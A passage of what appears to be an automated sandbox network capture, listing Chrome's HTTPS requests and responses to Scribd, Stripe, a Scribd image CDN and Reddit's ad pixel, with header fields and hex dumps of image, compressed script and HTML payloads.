                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ve>3}tDT~KX=jo=uVMu*L+hFc]Ar9|6){ZB=)q?|:l{`$yv& YM#,_yj$zzi{-5A\yihMeT]}L|03kUFTDEtr
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC667INData Raw: 50 74 80 3c 70 ab b7 e3 a8 f3 40 0e 6c 13 3a 05 d5 88 8a d8 36 15 49 90 8b b7 37 ec d1 05 44 f3 10 59 9b ce c2 3b b2 16 03 f8 d0 29 38 93 c9 15 36 09 18 bf 43 52 56 d8 51 50 41 10 24 a6 fa 32 5b 58 e5 c4 e1 9a 98 8a 68 4d c7 b2 ca 75 0a 17 c5 a5 48 70 df 93 82 9b 8c 3b 80 10 81 36 21 41 1c bd f9 3e b2 e2 62 9b 79 fd 35 ce 71 08 4a 0b 09 51 1d e3 bb cc 24 88 02 69 c1 9f c8 42 1e de 31 d6 d9 fc c6 3e 8d 64 75 1f 7d 8f 43 b5 58 56 f0 3e 51 7b f5 10 59 8e a8 be 22 8e 13 c2 87 f9 64 05 c0 31 75 e4 47 1d 25 ec a1 64 5f e0 5d 23 cf b1 db 84 f5 85 c4 ed b2 f7 a1 12 0f 11 82 2f 6b b1 ac 3e 27 b9 6d df 1f 25 8e f3 92 21 99 04 79 fb 11 96 da 21 01 71 fc cc 26 d5 ab 7c 82 2c ef c0 54 df a0 66 eb b8 8d f7 dc 12 73 85 8f 3e 26 b2 9b 39 15 10 5c bd 35 74 14 65 9c fd 8e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Pt<p@l:6I7DY;)86CRVQPA$2[XhMuHp;6!A>by5qJQ$iB1>du}CXV>Q{Y"d1uG%d_]#/k>'m%!y!q&|,Tfs>&9\5te


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        67192.168.2.1649801216.137.52.914436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC722OUTGET /v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: js.stripe.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1444INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 200
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 22 Nov 2024 21:05:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Server: Cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "3437aaddcdf6922d623e172c2d6f9278"
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 0d8fb9ea76ca48d1884fa97507d30086.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        Age: 129
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: base-uri 'none'; connect-src 'self' https://r.stripe.com; default-src 'self'; font-src 'none'; form-action 'none'; frame-src https://m.stripe.network; img-src https://q.stripe.com; media-src 'none'; object-src 'none'; script-src 'self'; style-src 'self'; worker-src 'none'; report-uri https://q.stripe.com/csp-report
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy-Report-Only: base-uri 'none'; connect-src 'self' https://r.stripe.com; default-src 'self'; font-src 'none'; form-action 'none'; frame-src https://m.stripe.network; img-src https://q.stripe.com; media-src 'none'; object-src 'none'; script-src 'self'; style-src 'self'; worker-src 'none'; report-uri https://q.stripe.com/csp-report
                                                                                                                                                                                                                                                                                                                                                                                        Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: MRS52-P2
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: UmQxT8l2acZQre6lOkTYXCZIYeNzy4jqYPaH9kqZ9UmxRb8pGM-bsQ==
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC200INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 73 74 72 69 70 65 2e 63 6f 6d 2f 76 33 2f 66 69 6e 67 65 72 70 72 69 6e 74 65 64 2f 6a 73 2f 6d 2d 6f 75 74 65 72 2d 31 35 61 32 62 34 30 61 30 35 38 64 64 66 66 31 63 66 66 64 62 36 33 37 37 39 66 65 33 64 65 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8"/><script defer="defer" src="https://js.stripe.com/v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js"></script></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        68192.168.2.1649803151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC2521OUTGET /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC389INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 0
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740050-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        69192.168.2.1649804151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC411OUTGET /img/word_document/357813054/149x198/d1d2a4e180/1732363287?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 8149
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 67
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 279095
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-kigq8000062-CHI, cache-nyc-kteb1890078-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 47, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522374.273759,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 00 00 00 ff fd ff cf cf cf f9 ff ff f9 f9 f9 02 02 02 f7 f7 f7 ff ff ff fd fd fd fb fb fb ff f9 ff f7 ff fd fd fd f7 00 01 00 cb 9d a5 cf a5 ad f9 ef ed f7 e7 e7 f5 f5 f6 fb fb fd f5 fd fb 04 04 04 f3 f3 f3 f7 fb f7 04 00 02 b8 b8 b8 96 96 96 f1 f1 f1 a4 a4 a4 92 92 92 02 00 00 f7 fb f5 06 06 06 ef ef ef 9e 9e 9e 06 05 01 ea ea e9 cd cd cd 99 99 99 ff fb ff ed ee ed 07 00 00 c5 c5 c5 b3 b3 b3 04 00 00 b1 b1 b1 c7 c7 c7 01 04 03 eb eb eb 0c 01 02 00 04 00 9b 9b 9b 00 07 00 8b 8b 8b 07 01 04 fd ff ff bd bd bd c9 c9 c9 fb ff fd c3 c3 c3 d7 d7 d7 fe ff
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTE
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 2b 2d 23 a7 4e 0e 5b 16 d4 ce 1e df b4 bc 18 be c8 3a 2b e4 6f 73 38 3d a7 07 ea 16 ac b3 72 38 1d ce 19 86 d1 f6 b7 9c 1c 61 9a b0 20 71 c4 79 f4 ee 86 66 46 59 da dd 7b ba 23 00 51 f6 d0 82 af 38 87 07 5a f6 5c 74 0f 03 ab 3d 17 66 80 51 23 cc 5e 6c b0 ba 30 d8 93 46 16 ab 7e d2 62 f5 ea f0 c6 30 03 91 c1 8c 74 1c 1e 69 ce db 03 f5 a7 32 fd aa db d1 a5 fd 03 2b aa 1b f4 07 ba 42 07 1c fd 20 c6 f8 ef 03 b7 87 ac 5a 8e 69 8c 95 19 80 95 a9 c3 09 53 e7 a6 d4 e6 a2 76 bf fd 65 a6 09 6f 3f e2 0a 34 12 57 c0 d1 ea 7f e1 2b 10 63 24 c4 a0 19 e9 cf b7 0c 23 ff 33 0e cb af 16 8f b7 5d 1c d9 98 3e d6 3e a1 99 31 b8 09 99 c1 df 72 56 b3 b6 00 bf fa f2 e0 dc 22 33 e0 7e 76 b0 7f d0 4f 2d 9f 3a 3e 32 d8 d6 da 0c ab 33 ce 40 23 73 05 3c ad da 40 7b 2b 98 70 ce 33 8d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +-#N[:+os8=r8a qyfFY{#Q8Z\t=fQ#^l0F~b0ti2+B ZiSveo?4W+c$#3]>>1rV"3~vO-:>23@#s<@{+p3
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 9f 6b e4 67 e8 12 38 0e 43 7f 00 1d 82 17 0a b2 35 41 43 03 2d 9a 45 9b b3 40 5b 7d 8d d9 2d 98 02 3b d3 05 f3 10 dd 3c 2f 42 7f e2 15 25 a8 7b 2a 3c b8 17 3a 84 7a 66 80 96 06 d4 67 92 57 13 82 e0 85 9e 42 14 a1 bb 50 91 a5 21 9a 26 cd aa 67 36 38 44 5d 63 76 c7 6a c3 86 8d c7 eb 5f ea bb 11 c4 9e dd 08 e2 53 bb 11 c4 67 76 23 88 97 76 23 88 7d bb 11 c4 e7 76 23 88 cf ee 46 10 9f de 8d f8 3f 63 d5 f9 3f c2 63 c0 aa b3 ef a6 af f3 44 9f cb e5 ea 74 f5 75 ba 5c 3e df 09 18 f7 b9 dd 2e 1f 5c 7c 37 2f b9 6e f6 9d b8 e4 eb 3b 01 b7 b0 f7 d7 4d 49 d7 a5 4b e6 c5 e7 ea 7b c9 e7 db eb 73 ed 75 9d e8 bc 04 6f 98 db 0b 6f 1f 2c 76 3e d5 d9 07 3b ba 3a 7d 27 3a 61 e3 3e 97 ef 6b 4f 3c f1 1f b3 ea fc ee ef 6e 7c f4 da f5 77 3d df fb bc fb c9 ab df de 77 cd f3 d1 d8
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: kg8C5AC-E@[}-;</B%{*<:zfgWBP!&g68D]cvj_Sgv#v#}v#F?c?cDtu\>.\|7/n;MIK{suoo,v>;:}':a>kO<n|w=w
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: f8 1c e7 f1 24 cb 9e 30 e7 c8 97 5c 6e 6f 90 8b d9 f9 74 2a 98 4a 45 62 55 71 eb 7b 45 76 0b 9a a5 ee 90 3f dc ac c3 40 aa 51 75 65 8a b2 47 0e 93 95 39 5b 4c 88 0a 75 d6 08 24 f2 42 c3 5e 75 fa f4 b2 2c 94 65 55 66 93 01 5b 49 0f e4 70 dc de 4c cb 46 5a 88 59 a0 1e f6 08 01 47 43 f6 0a 46 34 e5 b6 09 39 c3 ee 2f f3 95 84 d3 17 8c 11 2b 23 25 c4 cb 42 86 ad 26 79 35 61 37 9c 86 dd 50 b6 8e 2b a4 31 bc 57 0c 26 bd 8d 00 40 e5 68 85 6d 77 b5 3b 93 45 4b 1d d5 c3 51 8b 37 e7 c5 38 53 ce b5 d7 2d 7c 16 57 ea 5e 6f c4 2b e5 9d 20 dd 6e 89 e4 e2 69 8d ad 67 a1 b3 11 71 36 ea 30 dc 08 5b a4 6c 3a 68 89 36 bc 91 50 d0 69 c9 55 2a 4e 98 f7 f9 ea c1 70 34 eb b5 58 bc e1 9c 25 1c 8c e4 01 76 05 cb 91 76 97 4b 64 b6 44 d5 8a 3d 12 21 de 74 2b 86 29 57 68 eb 6e 65 cc
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $0\not*JEbUq{Ev?@QueG9[Lu$B^u,eUf[IpLFZYGCF49/+#%B&y5a7P+1W&@hmw;EKQ78S-|W^o+ nigq60[l:h6PiU*Np4X%vvKdD=!t+)Whne
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: ed 9e bd 3d b6 87 70 b0 69 d2 26 93 79 9e f9 cd 33 ff 97 df ef 37 d4 2f 67 2c 2e 62 f0 11 2d 26 a5 b9 82 e1 cf b1 4a 01 8a 8e 60 42 8b 42 89 65 f1 ba 14 2b bb 78 1f e4 69 91 04 1b e9 a4 24 c8 1d f3 92 4f 37 84 a0 9b cc 04 ac a2 97 62 55 8f 8f 5e 0b 15 49 4b 22 ee 56 0a 19 26 cb 09 b2 47 e2 bd 0e 29 93 a7 8c 34 17 f1 02 36 e6 e6 e2 b8 10 14 1c 52 42 33 b8 20 ae 71 f9 48 c4 83 49 29 5e e2 b2 8a 87 8b 65 7c 81 98 c4 f9 c5 2c cd 07 f3 78 20 a1 68 6c 9c d7 b8 38 66 01 9a cf 32 bc d6 e3 e1 98 38 f0 69 1c 9d cb 1a d9 8a a4 7b 80 5b 8d f1 0e 10 c9 64 2d ca 5c 33 07 61 e0 41 5a 06 4c 1a 29 02 48 d5 10 ff 23 48 1a 40 05 40 e3 84 03 6a 25 00 08 48 e5 3a 55 18 a9 b4 4d f8 a0 ea a0 6d 2a e8 40 ef 21 e7 03 34 06 03 92 c0 11 d3 43 24 91 62 9a 29 c8 e6 01 84 c2 b9 68 c2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =pi&y37/g,.b-&J`BBe+xi$O7bU^IK"V&G)46RB3 qHI)^e|,x hl8f28i{[d-\3aAZL)H#H@@j%H:UMm*@!4C$b)h
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1259INData Raw: 95 47 7a 93 a4 f9 6e fb 61 59 a4 e2 4e d7 b2 0e fd 2f 54 98 f9 26 47 20 f2 64 3b 30 57 d0 01 3c 89 da 52 dd 4f a2 82 ab 66 fe 67 a5 67 2e 39 c0 cb b6 31 f1 8e c7 2a df 63 f9 74 08 e4 1e ad 9c 1e 4e f4 3f 50 5e 55 87 88 04 8a db a1 47 e2 4e 2c 5e ce 7b f3 38 a1 1b 20 9e cd e3 ba 08 02 22 88 3a 30 6f a8 39 eb 22 7e 96 56 fd 79 a8 08 58 95 68 8a 39 19 ee 49 ff 50 fa 0d c7 1a bb 2a 24 d9 b1 2b 7a 32 fd b5 78 78 97 17 3e 3b 9a 7f 1b 29 46 3e 4a 99 ef 13 15 cc e6 84 95 2b 32 52 f2 64 e9 87 df 49 74 07 2c 74 1d bb 1c 1d f1 84 7c f8 64 e0 f0 49 bd c3 d9 71 d8 1f fc 5a 25 df 23 aa 6a 20 b9 54 07 57 c4 bc 31 5d c1 2b 80 c0 3d 46 12 2b 66 28 8b f7 72 bc 2b e3 70 47 c3 98 3f 85 bf 4f 54 4b d7 11 79 b1 76 9f a5 10 f5 a4 96 ba 6e d5 da ad de 02 78 7f a8 56 66 93 69 df
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GznaYN/T&G d;0W<ROfgg.91*ctN?P^UGN,^{8 ":0o9"~VyXh9IP*$+z2xx>;)F>J+2RdIt,t|dIqZ%#j TW1]+=F+f(r+pG?OTKyvnxVfi


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        70192.168.2.1649805151.101.193.1404436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC530OUTGET /ads/pixel.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.redditstatic.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 12220
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 18 Nov 2024 21:16:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "1a001f3a066bff47a766099b87253911"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=60
                                                                                                                                                                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: snooserv
                                                                                                                                                                                                                                                                                                                                                                                        Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                                        NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d4 3b 6b 73 da c8 96 7f 05 ab 6e b8 92 69 cb 80 b1 93 08 6b 5c 04 e4 98 89 8d bd 3c 9c 4c b9 18 4a 96 1a 50 22 24 46 12 71 bc 86 fd ed 7b fa 25 b5 04 b6 93 3b 3b 1f 36 95 42 dd 7d 4e 9f 77 9f 3e dd 92 f7 a6 ab c0 49 bc 30 28 45 2a 46 01 4a b4 a7 74 24 54 3d 34 d5 9e bc a9 ba 17 dc 79 63 d6 c2 b4 f5 dd 8e 4a 8e a9 08 54 c5 34 93 c7 25 0e a7 a5 08 ff b5 f2 22 5c 2e f3 46 93 cc 99 96 cb 8e 16 e1 64 15 05 25 07 88 ee 55 35 32 be 12 63 2b 3e 46 a8 da 66 80 1f 4a 56 14 85 91 aa b4 ed 20 08 93 d2 d4 0b dc d2 22 74 57 3e 2e fd 5b a9 78 15 e5 df 8a d6 4c e6 51 f8 50 b2 75 27 74 b1 a9 5c 5d 77 46 97 d6 a4 77 3d 9c 9c 5f 8f 7a 1d 05 d9 1b 42 6f 69 12 d9 cd 27 fc 63 19 46 49 6c 3c 6d 36 4d a2 c3 5d 75 ac 3b b6 ef ab 4b 9d 83 90 d0 46 8d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ;ksnik\<LJP"$Fq{%;;6B}Nw>I0(E*FJt$T=4ycJT4%"\.Fd%U52c+>FfJV "tW>.[xLQPu't\]wFw=_zBoi'cFIl<m6M]u;KF
